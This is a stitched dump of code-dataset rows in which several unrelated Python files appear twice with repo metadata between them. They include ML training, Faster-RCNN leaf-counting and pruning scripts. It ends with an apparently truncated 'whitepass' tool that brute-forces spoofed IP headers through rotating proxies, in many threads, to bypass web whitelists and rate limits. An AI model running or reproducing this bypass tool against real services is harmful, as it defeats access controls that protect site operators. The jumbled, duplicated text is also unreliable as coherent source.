# coding: utf-8 #,jsonify # data = request.get_data() # 获取前端数据 # data = str(data, 'utf-8') # 转utf-8 # data = json.loads(data) # json转字典 # if data is None: # data = request.form.to_dic() # elif data is None: # data = json.loads(request.args().decode("utf-8"), strict=False) # return jsonify(data_dic) # Linux路径分割 def bytes2human(n): symbols = ('K','M','G','T','P','E','Z','Y') prefix = {} for i,s in enumerate(symbols): prefix[s] = 1<<(i+1)*10 for s in reversed(symbols): if n >= prefix[s]: value = float(n)/prefix[s] return '%.2f%s'%(value,s) return '%.2fB'%(n) # , as_attachment=True, attachment_filename='data.file')) # 对中文进行URL编码 # response.headers["Content-Length"] = "%d"%total_size # 装饰器:参数和返回值都是函数 # 得到用户关于当前小程序的OpenID # session_key = data['session_key'] # return (openid, session_key) # def __init__(self, public_key=None, private_key=None): # self.public_key = public_key # self.private_key = private_key # def createRsaKeysPem(self, public_pem_save_path='./public_key.pem', private_pem_save_path='./private_key.pem', bytes=2048): # (pub_key, pri_key) = rsa.newkeys(bytes) # with open(public_pem_save_path, 'wb+') as f: # f.write(pub_key.save_pkcs1('PEM')) # with open(private_pem_save_path, 'wb+') as f: # f.write(pri_key.save_pkcs1('PEM')) # return (pub_key, pri_key) # def fromPemLoadRsaPriKey(self, path): # with open(path, 'rb') as f: # pem = f.read() # self.private_key = rsa.PrivateKey.load_pkcs1(pem) # return self.private_key # def decrypt(self, data, private_key=None): # if private_key is None: # private_key = self.private_key # return rsa.decrypt(data, private_key)
2.623402
3
src/baxter_learning/src/baxter_hw_env/baxter_hw_env/envs/__init__.py
calhwd15508/106B-Project1
3
6618621
<gh_stars>1-10 #from quadrotor_14d_hw_env.envs.quadrotor_14d_hw_env import Quadrotor14dHwEnv from baxter_hw_env import BaxterHwEnv
#from quadrotor_14d_hw_env.envs.quadrotor_14d_hw_env import Quadrotor14dHwEnv from baxter_hw_env import BaxterHwEnv
ca
0.104413
#from quadrotor_14d_hw_env.envs.quadrotor_14d_hw_env import Quadrotor14dHwEnv
1.04539
1
main.py
kienvu58/chord-progression-modeling
0
6618622
<reponame>kienvu58/chord-progression-modeling import torch import torch.optim as optim import numpy as np import shutil import itertools import json import time import math from generate_vocabulary import generate_vocab from generate_similarity_target import generate_target from modules.tokenizers import ChordCharacterTokenizer, NoteTokenizer from modules.dataset_readers import CpmDatasetReader from modules.chord_progression_models import Cpm from modules.predictors import Predictor from allennlp.training.learning_rate_schedulers import CosineWithRestarts from allennlp.data.vocabulary import Vocabulary from allennlp.modules.text_field_embedders import ( TextFieldEmbedder, BasicTextFieldEmbedder, ) from allennlp.modules.token_embedders import Embedding, TokenCharactersEncoder from allennlp.modules.seq2vec_encoders import ( AugmentedLstm, BagOfEmbeddingsEncoder, CnnEncoder, CnnHighwayEncoder, PytorchSeq2VecWrapper, ) from allennlp.modules.seq2seq_encoders import ( Seq2SeqEncoder, PytorchSeq2SeqWrapper, IntraSentenceAttentionEncoder, StackedSelfAttentionEncoder, ) from allennlp.modules.similarity_functions import MultiHeadedSimilarity from allennlp.common.file_utils import cached_path from allennlp.data.iterators import BucketIterator from allennlp.data.token_indexers import ( TokenIndexer, SingleIdTokenIndexer, TokenCharactersIndexer, ) from allennlp.training.trainer import Trainer import logging import sys import os logging.basicConfig(stream=sys.stdout, level=logging.INFO) torch.manual_seed(1) if not os.path.isdir("logs/tmp"): os.makedirs("logs/tmp") def run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams): log = {} log["name"] = "{} {} {} {}".format( rnn_type, embedding_type, "similarity_target" if use_similarity_targets else "hard_target", hparams["update_targets"] ) vocab = Vocabulary().from_files(hparams["vocab_path"]) if embedding_type == "Chord": # data reader reader = CpmDatasetReader() # chord embedder token_embedding = Embedding( num_embeddings=vocab.get_vocab_size("tokens"), embedding_dim=hparams["chord_token_embedding_dim"], ) chord_embedder = BasicTextFieldEmbedder({"tokens": token_embedding}) elif embedding_type == "Note": # data reader note_tokenizer = NoteTokenizer() note_indexer = TokenCharactersIndexer( namespace="notes", min_padding_length=4, character_tokenizer=note_tokenizer ) reader = CpmDatasetReader( token_indexers={"tokens": SingleIdTokenIndexer(), "notes": note_indexer} ) # chord embedder token_embedding = Embedding( num_embeddings=vocab.get_vocab_size("tokens"), embedding_dim=hparams["chord_token_embedding_dim"], ) note_token_embedding = Embedding( vocab.get_vocab_size("notes"), hparams["note_embedding_dim"] ) note_encoder = CnnEncoder( num_filters=hparams["cnn_encoder_num_filters"], ngram_filter_sizes=hparams["cnn_encoder_n_gram_filter_sizes"], embedding_dim=hparams["note_embedding_dim"], output_dim=hparams["note_level_embedding_dim"], ) note_embedding = TokenCharactersEncoder( note_token_embedding, note_encoder) chord_embedder = BasicTextFieldEmbedder( {"tokens": token_embedding, "notes": note_embedding} ) else: raise ValueError("Unknown embedding type:", embedding_type) # read data train_dataset = reader.read(os.path.join( hparams["data_path"], "train.txt")) val_dataset = reader.read(os.path.join(hparams["data_path"], "val.txt")) test_dataset = reader.read(os.path.join(hparams["data_path"], "test.txt")) # contextualizer contextual_input_dim = chord_embedder.get_output_dim() if rnn_type == "RNN": contextualizer = PytorchSeq2SeqWrapper( torch.nn.RNN( contextual_input_dim, hparams["rnn_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "LSTM": contextualizer = PytorchSeq2SeqWrapper( torch.nn.LSTM( contextual_input_dim, hparams["lstm_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "GRU": contextualizer = PytorchSeq2SeqWrapper( torch.nn.GRU( contextual_input_dim, hparams["gru_hidden_dim"], batch_first=True, bidirectional=False ) ) else: raise ValueError("Unknown rnn type:", rnn_type) if use_similarity_targets: vocab_size = vocab.get_vocab_size("tokens") similarity_targets = Embedding( num_embeddings=vocab_size, embedding_dim=vocab_size, weight=torch.load(hparams["similarity_target_path"]), trainable=False, ) else: similarity_targets = None iterator = BucketIterator( batch_size=hparams["batch_size"], sorting_keys=[ ("input_tokens", "num_tokens")] ) iterator.index_with(vocab) batches_per_epoch = math.ceil(len(train_dataset) / hparams["batch_size"]) model_hparams = { "dropout": None, "similarity_targets": similarity_targets, "update_targets": hparams["update_targets"], "T_initial": hparams["T_initial"], "decay_rate": hparams["decay_rate"], "batches_per_epoch": batches_per_epoch, "fc_hidden_dim": hparams["fc_hidden_dim"] } # chord progression model model = Cpm( vocab, chord_embedder, contextualizer, model_hparams ) if torch.cuda.is_available(): cuda_device = 0 model = model.cuda(cuda_device) print("GPU available.") else: cuda_device = -1 optimizer = optim.Adam(model.parameters(), lr=hparams["lr"]) ts = time.gmtime() saved_model_path = os.path.join( hparams["saved_model_path"], time.strftime("%Y-%m-%d %H-%M-%S", ts)) serialization_dir = os.path.join(saved_model_path, "checkpoints") trainer = Trainer( model=model, optimizer=optimizer, iterator=iterator, train_dataset=train_dataset, validation_dataset=val_dataset, serialization_dir=serialization_dir, patience=hparams["patience"], num_epochs=hparams["num_epochs"], cuda_device=cuda_device, ) trainer.train() saved_model_path = os.path.join( saved_model_path, "{}.th".format(log["name"])) torch.save(model.state_dict(), saved_model_path) predictor = Predictor(model=model, iterator=iterator, cuda_device=cuda_device) pred_metrics = predictor.predict(test_dataset) log["metrics"] = pred_metrics log["saved_mode_path"] = saved_model_path return log def main(hparams): if not os.path.isdir("logs/tmp/"): os.makedirs("logs/tmp/") similarity_target_path = hparams["similarity_target_path"] embedding_type_list = ["Chord"] rnn_type_list = ["LSTM", "GRU", "RNN"] use_similarity_targets = hparams["use_similarity_targets"] result = {} result["similarity_target"] = similarity_target_path if use_similarity_targets else None result["experiments"] = [] for embedding_type, rnn_type in itertools.product( embedding_type_list, rnn_type_list ): log = run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams) result["experiments"].append(log) with open(os.path.join("logs", "tmp", "{} {}.json".format(log["name"], time.time())), "w") as f: json.dump(log, f, indent=4) result["hparams"] = hparams ts = time.gmtime() result_fn = "st={}, T0={}, lambda={}, time={}.json".format( similarity_target, T_initial, decay_rate, time.strftime("%Y-%m-%d %H-%M-%S", ts)) with open(os.path.join("logs", result_fn), "w") as f: json.dump(result, f, indent=4) if __name__ == "__main__": if not os.path.isdir("data/vocabulary/"): generate_vocab() similarity_target_list = [("distance_2", False)] for st, _ in similarity_target_list: if st is None: continue if not os.path.exists("data/targets/target_{}.th".format(st)): if "-" in st: weight_set = st.split("-") weight_set = [int(w) for w in weight_set] generate_target(weight_set) else: print("Target {} is not found!".format(st)) exit() T_initial_list = [0.05] decay_rate_list = [0.001] data_fold_list = [0, 1, 2, 3, 4] for data_fold, similarity_target, T_initial, decay_rate in itertools.product(data_fold_list, similarity_target_list, T_initial_list, decay_rate_list): data_path = "data/cv/{}/".format(data_fold) vocab_path = "data/vocabulary/" saved_model_path = "saved_models/" similarity_target_path = "data/targets/target_{}.th".format( similarity_target[0]) hparams = { "lr": 0.001, "batch_size": 32, "num_epochs": 200, "patience": 10, "rnn_hidden_dim": 128, "lstm_hidden_dim": 128, "gru_hidden_dim": 128, "fc_hidden_dim": 128, "chord_token_embedding_dim": 128, "note_embedding_dim": 64, "note_level_embedding_dim": 64, "cnn_encoder_num_filters": 16, "cnn_encoder_n_gram_filter_sizes": (2, 3, 4), "similarity_target_path": similarity_target_path, "update_targets": similarity_target[1], "T_initial": T_initial, "decay_rate": decay_rate, "data_path": data_path, "vocab_path": vocab_path, "saved_model_path": saved_model_path, "use_similarity_targets": True if similarity_target else False } main(hparams)
import torch import torch.optim as optim import numpy as np import shutil import itertools import json import time import math from generate_vocabulary import generate_vocab from generate_similarity_target import generate_target from modules.tokenizers import ChordCharacterTokenizer, NoteTokenizer from modules.dataset_readers import CpmDatasetReader from modules.chord_progression_models import Cpm from modules.predictors import Predictor from allennlp.training.learning_rate_schedulers import CosineWithRestarts from allennlp.data.vocabulary import Vocabulary from allennlp.modules.text_field_embedders import ( TextFieldEmbedder, BasicTextFieldEmbedder, ) from allennlp.modules.token_embedders import Embedding, TokenCharactersEncoder from allennlp.modules.seq2vec_encoders import ( AugmentedLstm, BagOfEmbeddingsEncoder, CnnEncoder, CnnHighwayEncoder, PytorchSeq2VecWrapper, ) from allennlp.modules.seq2seq_encoders import ( Seq2SeqEncoder, PytorchSeq2SeqWrapper, IntraSentenceAttentionEncoder, StackedSelfAttentionEncoder, ) from allennlp.modules.similarity_functions import MultiHeadedSimilarity from allennlp.common.file_utils import cached_path from allennlp.data.iterators import BucketIterator from allennlp.data.token_indexers import ( TokenIndexer, SingleIdTokenIndexer, TokenCharactersIndexer, ) from allennlp.training.trainer import Trainer import logging import sys import os logging.basicConfig(stream=sys.stdout, level=logging.INFO) torch.manual_seed(1) if not os.path.isdir("logs/tmp"): os.makedirs("logs/tmp") def run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams): log = {} log["name"] = "{} {} {} {}".format( rnn_type, embedding_type, "similarity_target" if use_similarity_targets else "hard_target", hparams["update_targets"] ) vocab = Vocabulary().from_files(hparams["vocab_path"]) if embedding_type == "Chord": # data reader reader = CpmDatasetReader() # chord embedder token_embedding = Embedding( num_embeddings=vocab.get_vocab_size("tokens"), embedding_dim=hparams["chord_token_embedding_dim"], ) chord_embedder = BasicTextFieldEmbedder({"tokens": token_embedding}) elif embedding_type == "Note": # data reader note_tokenizer = NoteTokenizer() note_indexer = TokenCharactersIndexer( namespace="notes", min_padding_length=4, character_tokenizer=note_tokenizer ) reader = CpmDatasetReader( token_indexers={"tokens": SingleIdTokenIndexer(), "notes": note_indexer} ) # chord embedder token_embedding = Embedding( num_embeddings=vocab.get_vocab_size("tokens"), embedding_dim=hparams["chord_token_embedding_dim"], ) note_token_embedding = Embedding( vocab.get_vocab_size("notes"), hparams["note_embedding_dim"] ) note_encoder = CnnEncoder( num_filters=hparams["cnn_encoder_num_filters"], ngram_filter_sizes=hparams["cnn_encoder_n_gram_filter_sizes"], embedding_dim=hparams["note_embedding_dim"], output_dim=hparams["note_level_embedding_dim"], ) note_embedding = TokenCharactersEncoder( note_token_embedding, note_encoder) chord_embedder = BasicTextFieldEmbedder( {"tokens": token_embedding, "notes": note_embedding} ) else: raise ValueError("Unknown embedding type:", embedding_type) # read data train_dataset = reader.read(os.path.join( hparams["data_path"], "train.txt")) val_dataset = reader.read(os.path.join(hparams["data_path"], "val.txt")) test_dataset = reader.read(os.path.join(hparams["data_path"], "test.txt")) # contextualizer contextual_input_dim = chord_embedder.get_output_dim() if rnn_type == "RNN": contextualizer = PytorchSeq2SeqWrapper( torch.nn.RNN( contextual_input_dim, hparams["rnn_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "LSTM": contextualizer = PytorchSeq2SeqWrapper( torch.nn.LSTM( contextual_input_dim, hparams["lstm_hidden_dim"], batch_first=True, bidirectional=False ) ) elif rnn_type == "GRU": contextualizer = PytorchSeq2SeqWrapper( torch.nn.GRU( contextual_input_dim, hparams["gru_hidden_dim"], batch_first=True, bidirectional=False ) ) else: raise ValueError("Unknown rnn type:", rnn_type) if use_similarity_targets: vocab_size = vocab.get_vocab_size("tokens") similarity_targets = Embedding( num_embeddings=vocab_size, embedding_dim=vocab_size, weight=torch.load(hparams["similarity_target_path"]), trainable=False, ) else: similarity_targets = None iterator = BucketIterator( batch_size=hparams["batch_size"], sorting_keys=[ ("input_tokens", "num_tokens")] ) iterator.index_with(vocab) batches_per_epoch = math.ceil(len(train_dataset) / hparams["batch_size"]) model_hparams = { "dropout": None, "similarity_targets": similarity_targets, "update_targets": hparams["update_targets"], "T_initial": hparams["T_initial"], "decay_rate": hparams["decay_rate"], "batches_per_epoch": batches_per_epoch, "fc_hidden_dim": hparams["fc_hidden_dim"] } # chord progression model model = Cpm( vocab, chord_embedder, contextualizer, model_hparams ) if torch.cuda.is_available(): cuda_device = 0 model = model.cuda(cuda_device) print("GPU available.") else: cuda_device = -1 optimizer = optim.Adam(model.parameters(), lr=hparams["lr"]) ts = time.gmtime() saved_model_path = os.path.join( hparams["saved_model_path"], time.strftime("%Y-%m-%d %H-%M-%S", ts)) serialization_dir = os.path.join(saved_model_path, "checkpoints") trainer = Trainer( model=model, optimizer=optimizer, iterator=iterator, train_dataset=train_dataset, validation_dataset=val_dataset, serialization_dir=serialization_dir, patience=hparams["patience"], num_epochs=hparams["num_epochs"], cuda_device=cuda_device, ) trainer.train() saved_model_path = os.path.join( saved_model_path, "{}.th".format(log["name"])) torch.save(model.state_dict(), saved_model_path) predictor = Predictor(model=model, iterator=iterator, cuda_device=cuda_device) pred_metrics = predictor.predict(test_dataset) log["metrics"] = pred_metrics log["saved_mode_path"] = saved_model_path return log def main(hparams): if not os.path.isdir("logs/tmp/"): os.makedirs("logs/tmp/") similarity_target_path = hparams["similarity_target_path"] embedding_type_list = ["Chord"] rnn_type_list = ["LSTM", "GRU", "RNN"] use_similarity_targets = hparams["use_similarity_targets"] result = {} result["similarity_target"] = similarity_target_path if use_similarity_targets else None result["experiments"] = [] for embedding_type, rnn_type in itertools.product( embedding_type_list, rnn_type_list ): log = run_experiment(use_similarity_targets, embedding_type, rnn_type, hparams) result["experiments"].append(log) with open(os.path.join("logs", "tmp", "{} {}.json".format(log["name"], time.time())), "w") as f: json.dump(log, f, indent=4) result["hparams"] = hparams ts = time.gmtime() result_fn = "st={}, T0={}, lambda={}, time={}.json".format( similarity_target, T_initial, decay_rate, time.strftime("%Y-%m-%d %H-%M-%S", ts)) with open(os.path.join("logs", result_fn), "w") as f: json.dump(result, f, indent=4) if __name__ == "__main__": if not os.path.isdir("data/vocabulary/"): generate_vocab() similarity_target_list = [("distance_2", False)] for st, _ in similarity_target_list: if st is None: continue if not os.path.exists("data/targets/target_{}.th".format(st)): if "-" in st: weight_set = st.split("-") weight_set = [int(w) for w in weight_set] generate_target(weight_set) else: print("Target {} is not found!".format(st)) exit() T_initial_list = [0.05] decay_rate_list = [0.001] data_fold_list = [0, 1, 2, 3, 4] for data_fold, similarity_target, T_initial, decay_rate in itertools.product(data_fold_list, similarity_target_list, T_initial_list, decay_rate_list): data_path = "data/cv/{}/".format(data_fold) vocab_path = "data/vocabulary/" saved_model_path = "saved_models/" similarity_target_path = "data/targets/target_{}.th".format( similarity_target[0]) hparams = { "lr": 0.001, "batch_size": 32, "num_epochs": 200, "patience": 10, "rnn_hidden_dim": 128, "lstm_hidden_dim": 128, "gru_hidden_dim": 128, "fc_hidden_dim": 128, "chord_token_embedding_dim": 128, "note_embedding_dim": 64, "note_level_embedding_dim": 64, "cnn_encoder_num_filters": 16, "cnn_encoder_n_gram_filter_sizes": (2, 3, 4), "similarity_target_path": similarity_target_path, "update_targets": similarity_target[1], "T_initial": T_initial, "decay_rate": decay_rate, "data_path": data_path, "vocab_path": vocab_path, "saved_model_path": saved_model_path, "use_similarity_targets": True if similarity_target else False } main(hparams)
en
0.454215
# data reader # chord embedder # data reader # chord embedder # read data # contextualizer # chord progression model
1.861912
2
CountingByDetection_FasterRCNNs/predict.py
huskermiao/MaizeLeafCounting
5
6618623
<reponame>huskermiao/MaizeLeafCounting<filename>CountingByDetection_FasterRCNNs/predict.py # -*- coding: UTF-8 -*- """ Detect leaf tips using a trained Faster-RCNN """ import os import time import datetime import argparse import numpy as np import pandas as pd from pathlib import Path import torch import utils from torch.utils.data import DataLoader from base import ObjectDetectionDataset, get_model, show_box, get_transform from engine import train_one_epoch, evaluate, idx_cleanboxes parser = argparse.ArgumentParser(description='Training CNNs', formatter_class=argparse.ArgumentDefaultsHelpFormatter) # required arguments parser.add_argument('model_fn', help='specify the filename of the trained model') parser.add_argument('testing_csv', help='tab separated csv file for testing') parser.add_argument('testing_img_dir', help='directory where testing images reside') parser.add_argument('output_prefix', help='the prefix of output files') # positional arguments parser.add_argument('--score_cutoff', type=float, default=0.5, help='set score cutoff') parser.add_argument('--second_cutoff', type=float, default=0.83, help='cutoff for solving overlapped bounding boxes') args = parser.parse_args() def predict(args): saved_model, test_csv, test_dir, output_prefix = args.model_fn, args.testing_csv, args.testing_img_dir, args.output_prefix device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print(f'device detected: {device}') model = get_model(num_classes=3) model.load_state_dict(torch.load(saved_model, map_location=device)) model.eval() test_dataset = ObjectDetectionDataset(test_csv, test_dir, get_transform(train=False), only_image=True, sep=',') test_loader = DataLoader(test_dataset, batch_size=1) filenames, lcs = [], [] # lcs: leaf counts print('start prediction...') for imgs, _, fns in test_loader: imgs = imgs.to(device) results = model(imgs) fn = fns[0] print(fn) boxes, labels, scores = results[0]['boxes'], results[0]['labels'], results[0]['scores'] boxes = np.array([i.to(device).tolist() for i in boxes]) labels = np.array([i.to(device).tolist() for i in labels]) scores = np.array([i.to(device).tolist() for i in scores]) idxs = np.argwhere(scores>args.score_cutoff).squeeze() boxes, labels, scores = boxes[idxs], labels[idxs], scores[idxs] # post-process boxes to remvoe redundancy final_idx = idx_cleanboxes(boxes, scores, second_cutoff=args.second_cutoff) boxes, labels, scores = boxes[final_idx], labels[final_idx], scores[final_idx] print('saving box coordinates, label, and score...') npy_prefix = '.'.join(fn.split('.')[0:-1]) df = pd.DataFrame(boxes) df.columns = ['x0', 'y0', 'x1', 'y1'] df['label'] = labels df['score'] = scores df.to_csv(npy_prefix+'.info.csv', index=False) print('adding predicted box on the original images...') img = show_box(Path(test_dir)/fn, boxes, labels, scores) img_out_fn = fn.replace('.png', '.prd.jpg') if fn.endswith('.png') else fn.replace('.jpg', '.prd.jpg') img.save(img_out_fn) filenames.append(fn) lcs.append(len(final_idx)) pd.DataFrame(dict(zip(['fn', 'lc'], [filenames, lcs]))).to_csv(output_prefix+'.prediction.csv', index=False) print('Done! check leaf counting results in %s.prediction.csv'%output_prefix) if __name__ == "__main__": predict(args)
# -*- coding: UTF-8 -*- """ Detect leaf tips using a trained Faster-RCNN """ import os import time import datetime import argparse import numpy as np import pandas as pd from pathlib import Path import torch import utils from torch.utils.data import DataLoader from base import ObjectDetectionDataset, get_model, show_box, get_transform from engine import train_one_epoch, evaluate, idx_cleanboxes parser = argparse.ArgumentParser(description='Training CNNs', formatter_class=argparse.ArgumentDefaultsHelpFormatter) # required arguments parser.add_argument('model_fn', help='specify the filename of the trained model') parser.add_argument('testing_csv', help='tab separated csv file for testing') parser.add_argument('testing_img_dir', help='directory where testing images reside') parser.add_argument('output_prefix', help='the prefix of output files') # positional arguments parser.add_argument('--score_cutoff', type=float, default=0.5, help='set score cutoff') parser.add_argument('--second_cutoff', type=float, default=0.83, help='cutoff for solving overlapped bounding boxes') args = parser.parse_args() def predict(args): saved_model, test_csv, test_dir, output_prefix = args.model_fn, args.testing_csv, args.testing_img_dir, args.output_prefix device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print(f'device detected: {device}') model = get_model(num_classes=3) model.load_state_dict(torch.load(saved_model, map_location=device)) model.eval() test_dataset = ObjectDetectionDataset(test_csv, test_dir, get_transform(train=False), only_image=True, sep=',') test_loader = DataLoader(test_dataset, batch_size=1) filenames, lcs = [], [] # lcs: leaf counts print('start prediction...') for imgs, _, fns in test_loader: imgs = imgs.to(device) results = model(imgs) fn = fns[0] print(fn) boxes, labels, scores = results[0]['boxes'], results[0]['labels'], results[0]['scores'] boxes = np.array([i.to(device).tolist() for i in boxes]) labels = np.array([i.to(device).tolist() for i in labels]) scores = np.array([i.to(device).tolist() for i in scores]) idxs = np.argwhere(scores>args.score_cutoff).squeeze() boxes, labels, scores = boxes[idxs], labels[idxs], scores[idxs] # post-process boxes to remvoe redundancy final_idx = idx_cleanboxes(boxes, scores, second_cutoff=args.second_cutoff) boxes, labels, scores = boxes[final_idx], labels[final_idx], scores[final_idx] print('saving box coordinates, label, and score...') npy_prefix = '.'.join(fn.split('.')[0:-1]) df = pd.DataFrame(boxes) df.columns = ['x0', 'y0', 'x1', 'y1'] df['label'] = labels df['score'] = scores df.to_csv(npy_prefix+'.info.csv', index=False) print('adding predicted box on the original images...') img = show_box(Path(test_dir)/fn, boxes, labels, scores) img_out_fn = fn.replace('.png', '.prd.jpg') if fn.endswith('.png') else fn.replace('.jpg', '.prd.jpg') img.save(img_out_fn) filenames.append(fn) lcs.append(len(final_idx)) pd.DataFrame(dict(zip(['fn', 'lc'], [filenames, lcs]))).to_csv(output_prefix+'.prediction.csv', index=False) print('Done! check leaf counting results in %s.prediction.csv'%output_prefix) if __name__ == "__main__": predict(args)
en
0.434715
# -*- coding: UTF-8 -*- Detect leaf tips using a trained Faster-RCNN # required arguments # positional arguments # lcs: leaf counts # post-process boxes to remvoe redundancy
2.574214
3
yolov4_pytorch/utils/prune.py
Lornatang/YOLOv4-PyTorch
19
6618624
<filename>yolov4_pytorch/utils/prune.py # Copyright 2020 Lorna Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import torch.nn as nn def sparsity(model): # Return global model sparsity a, b = 0., 0. for p in model.parameters(): a += p.numel() b += (p == 0).sum() return b / a def prune(model, amount=0.3): # Prune model to requested global sparsity import torch.nn.utils.prune as prune print("Pruning model... ", end="") for name, m in model.named_modules(): if isinstance(m, nn.Conv2d): prune.l1_unstructured(m, name="weight", amount=amount) # prune prune.remove(m, "weight") # make permanent print(f" {sparsity(model):.3f} global sparsity")
<filename>yolov4_pytorch/utils/prune.py # Copyright 2020 Lorna Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import torch.nn as nn def sparsity(model): # Return global model sparsity a, b = 0., 0. for p in model.parameters(): a += p.numel() b += (p == 0).sum() return b / a def prune(model, amount=0.3): # Prune model to requested global sparsity import torch.nn.utils.prune as prune print("Pruning model... ", end="") for name, m in model.named_modules(): if isinstance(m, nn.Conv2d): prune.l1_unstructured(m, name="weight", amount=amount) # prune prune.remove(m, "weight") # make permanent print(f" {sparsity(model):.3f} global sparsity")
en
0.796564
# Copyright 2020 Lorna Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # Return global model sparsity # Prune model to requested global sparsity # prune # make permanent
2.312798
2
whitepass.py
cyberstruggle/whitepass
20
6618625
<gh_stars>10-100 #!/usr/bin/env python3 from utils import * import argparse import sys import os import requests import random import concurrent.futures import threading import time from concurrent.futures import ThreadPoolExecutor, as_completed banner = """ ██╗ ██╗██╗ ██╗██╗████████╗███████╗██████╗ █████╗ ███████╗███████╗ ██║ ██║██║ ██║██║╚══██╔══╝██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝ ██║ █╗ ██║███████║██║ ██║ █████╗ ██████╔╝███████║███████╗███████╗ ██║███╗██║██╔══██║██║ ██║ ██╔══╝ ██╔═══╝ ██╔══██║╚════██║╚════██║ ╚███╔███╔╝██║ ██║██║ ██║ ███████╗██║ ██║ ██║███████║███████║ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝ Bypass Whitelist/Ratelimit Implementations in Web Applications/APIs By : <NAME> (@wazehell) (Cyber Struggle Delta Group) """ KNOWN_PAYLOADS_PATH = "./db/known_payloads.txt" KNOWN_HEADERS_PATH = "./db/headers.txt" DEFAULT_THREADS = 50 ALL_PAYLOADS = None PROXIES_LIST = [] def start_whitepass(url=None,method="get",data={},headers={}): request_headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'} request_headers.update(headers) request_data = {} proxies = {} request_data.update(data) request_func = None bad_http = [400,500,407,408,405,429] content_len = 0 http_status = 200 http_timeout = 120 try: request_func = getattr(requests, method.lower()) except Exception as e: print("[*] Method Not found !") exit() def do_request(payload={}): try: reqproxies = {} pxomsg = "" if len(PROXIES_LIST): reqproxies = random.choice(PROXIES_LIST) headers = request_headers.copy() headers.update(payload) req = request_func(url,headers=headers,data=data,timeout=http_timeout,proxies=reqproxies) reqc = req.headers.get('Content-Length',0) if len(PROXIES_LIST): pxomsg = f" via ({reqproxies['http']})" else: pxomsg = f" via localhost " if not reqc == content_len and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent Content-Length Using Header : {payload}") if not http_status == req.status_code and (not int(req.status_code) in bad_http): print(f"[+] {pxomsg} Response with Diffrent HTTP-Status Using Header : {payload}") return req except Exception as e: pass #testing stage try: req0 = request_func(url,headers=headers,data=data,timeout=http_timeout) req0c = req0.headers.get('Content-Length',0) data.update({'test':str('A'*50)}) req1 = request_func(url,headers=headers,data=data,timeout=http_timeout) req1c = req1.headers.get('Content-Length',0) req2 = request_func(url,headers=headers,params=data,timeout=http_timeout) req2c = req2.headers.get('Content-Length',0) data.update({'test':str('A'*100)}) req3 = request_func(url,headers=headers,params=data,timeout=120) req3c = req3.headers.get('Content-Length',0) if req0c == req1c == req2c: content_len = req0c else: if int(int(req2c) - int(req0c)) == 50: content_len = req0c else: #todo pass if req0.status_code == req2.status_code == req3.status_code: http_status = req0.status_code else: http_status = req0.status_code #todo if http_status == 429: http_status = 200 print(f'[*] Content-Length Response {content_len}') print(f'[*] HTTP-Status Response {http_status}') except Exception as e: pass start = time.time() processes = [] print(f"[*] Starting Test with {len(ALL_PAYLOADS)} Payload") with ThreadPoolExecutor(max_workers=DEFAULT_THREADS) as executor: for payload in ALL_PAYLOADS: processes.append(executor.submit(do_request, payload)) print(f'[*] Testing Done : {time.time() - start}') def whitepass(request_options=None,target_options=None,payload_options=None): global KNOWN_PAYLOADS_PATH,KNOWN_HEADERS_PATH,DEFAULT_THREADS global ALL_PAYLOADS,PROXIES_LIST parsed_request = None additionalrequest_headers = {} additionalrequest_data = {} urllist = target_options['urllist'] url = target_options['url'] requestFile = target_options['requestFile'] request_method = request_options.get('method','get') request_headers = request_options.get('headers',None) request_data = request_options.get('data',None) known_ips = payload_options['known_ips'] additionalheaders = payload_options['additionalheaders'] proxylist = payload_options['proxylist'] additionalpayloads = payload_options['additionalpayloads'] threads = payload_options.get('threads',DEFAULT_THREADS) if threads: DEFAULT_THREADS = int(threads) if request_headers: for reqheader in request_headers.split('\\n'): headerk = str(reqheader.split(':')[0]).replace(' ','') headerv = str(reqheader.split(':')[1]).replace(' ','') additionalrequest_headers[headerk] = headerv if request_data: additionalrequest_data = {x[0] : x[1] for x in [x.split("=") for x in request_data[1:].split("&") ]} if proxylist: if os.path.exists(proxylist): for p in open(proxylist,'r').readlines(): p = p.replace('\n', '') g = p.split(':') proxy_object = { 'http': f'http://{g[0]}:{g[1]}', 'https': f'http://{g[0]}:{g[1]}', } PROXIES_LIST.append(proxy_object) payloads = prepre_payloads(known_ips=known_ips,known_payloads_path=KNOWN_PAYLOADS_PATH, additionalpayloads=additionalpayloads) headers = prepre_headers(additionalheaders=additionalheaders, known_headers_path=KNOWN_HEADERS_PATH) ALL_PAYLOADS = prepare_all(headers=headers,payloads=payloads) urls = [] if url: 